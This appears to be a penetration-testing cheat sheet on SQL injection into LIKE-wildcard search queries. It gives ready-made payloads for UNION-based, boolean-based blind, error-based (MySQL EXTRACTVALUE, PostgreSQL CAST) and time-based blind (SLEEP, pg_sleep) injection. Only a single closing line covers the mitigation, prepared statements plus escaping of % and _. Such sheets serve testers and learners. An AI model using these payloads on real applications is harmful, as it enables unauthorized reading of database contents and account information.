🧠 SQLi Context - LIKE (wildcards)

Exploitations

SQLi - UNION-based

Break out of the string and append your query.

-- Universal Bypass (Works on Contains, Starts With, and Ends With) 
test' UNION {SELECT_query}-- 
 
-- Logical Closures (Use if comments are filtered) 
-- For "Contains" (LIKE '%{input}%'): test' UNION {SELECT_query} AND '%'=' -- For "Starts With" (LIKE '{input}%'): 
test' UNION {SELECT_query} AND '%'=' 
 
-- For "Ends With" (LIKE '%{input}'): 
test' UNION {SELECT_query} AND ''='

SQLi - Boolean-based Blind

Append AND conditions to test True/False logic. The examples below use the universal comment bypass.

Code snippet

-- Syntax: [Valid Search]' AND ([Your Condition])--
 
-- Example: Check if the database version starts with 5
test' AND (SUBSTRING(@@version,1,1)='5')--

SQLi - Error-based

Force an error that leaks data directly to the web page.

Code snippet

-- Syntax: [Valid Search]' AND [Error Function]--
 
-- MySQL: XPATH Error
test' AND EXTRACTVALUE(1, CONCAT(0x7e, ({query})))--
 
-- PostgreSQL: Cast Error
test' AND CAST(({query}) AS INT)--

SQLi - Time-based Blind

Force a database sleep if a condition is met.

-- Syntax: [Valid Search]' AND [Sleep Function]--
 
-- MySQL: If user is admin, sleep 5 seconds
test' AND IF((SELECT user)='admin', SLEEP(5), 0)--
 
-- PostgreSQL:
test' AND (SELECT CASE WHEN ((SELECT current_user)='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END)--

Mitigation

  • Fix: Use Prepared Statements. Additionally, if the application needs to treat user input as literal characters rather than wildcards, the user’s % and _ characters must be manually escaped (e.g., \%, \_) before being passed to the query.
FileCreated